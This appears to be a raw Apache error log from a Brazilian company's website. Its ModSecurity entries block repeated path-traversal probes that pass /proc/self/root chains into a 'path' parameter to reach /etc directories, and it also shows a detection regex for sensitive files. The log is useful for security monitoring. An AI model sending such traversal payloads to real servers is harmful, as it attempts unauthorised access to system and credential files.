[uri "/"] [unique_id "abwyf8df6f5d65gmYZSVYgAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:29:40.131153 2026] [proxy_fcgi:error] [pid 7545:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57562] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:29:52.847663 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:58412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwykMdf6f5d65gmYZSVcgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:30:05.738192 2026] [:error] [pid 8307:tid 140411649607424] [client 74.7.241.31:40874] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwynL-FhjpZGs9ba8qGPAAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:30:08.122451 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58192] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:30:11.911356 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:39424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyo-oXxyEfFpUF8f8ntAAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:30:17.635330 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:45322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyqQkwaGbbGflqUZDkzgAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:30:23.382737 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:45330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyr8df6f5d65gmYZSVewAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:30:24.580442 2026] [:error] [pid 27293:tid 140411741927168] [client 74.7.243.128:54856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwysP-YZRR_7pZ7nDKmsQAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:30:38.012965 2026] [:error] [pid 8307:tid 140411582465792] [client 74.7.241.31:50554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyvr-FhjpZGs9ba8qGVwAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:30:40.497870 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58934] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:31:17.097886 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59786] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:31:27.298904 2026] [:error] [pid 8307:tid 140411666392832] [client 74.7.243.128:58816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwy77-FhjpZGs9ba8qGaQAAAwk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:31:40.729860 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:42262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwy_OoXxyEfFpUF8f8n0AAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:31:43.146107 2026] [proxy_fcgi:error] [pid 7545:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60362] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:31:51.604164 2026] [:error] [pid 7545:tid 140411691570944] [client 74.7.241.31:39096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzB38B84UptSoTJtYqewAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:31:52.133768 2026] [core:alert] [pid 30077:tid 140411557287680] [client 57.141.18.11:35552] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:32:06.122882 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:32780] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:32:07.276444 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:37460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzF8df6f5d65gmYZSVvgAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:32:09.591980 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:53794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzGRCii7xarUs8iHYEvQAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:32:20.454895 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:49834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzJNa6ubjKNq_cu4ZyLwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:32:26.895526 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:57504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzKuoXxyEfFpUF8f8n9gAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:32:32.599102 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:49838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzMPqxLDW4GITHUkSEMgAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:32:33.033878 2026] [proxy_fcgi:error] [pid 7235:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33624] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:32:36.308538 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:58776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzNMdf6f5d65gmYZSV2QAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:32:36.596285 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:35000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzNMdf6f5d65gmYZSV2wAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:32:43.455186 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:50162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzOxCii7xarUs8iHYE1wAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:32:44.122461 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.228.61:41076] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwzPBCii7xarUs8iHYE2AAAAg8"]
[Thu Mar 19 14:32:51.461316 2026] [mime_magic:error] [pid 7545:tid 140411540502272] (70014)End of file found: [client 57.141.18.92:37506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:32:53.662516 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.243.128:41742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzRQbLMZ6AikZjR9V5GQAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:32:56.177817 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34264] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:33:01.567767 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:51030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzTda6ubjKNq_cu4ZyQQAAA0M"], referer: 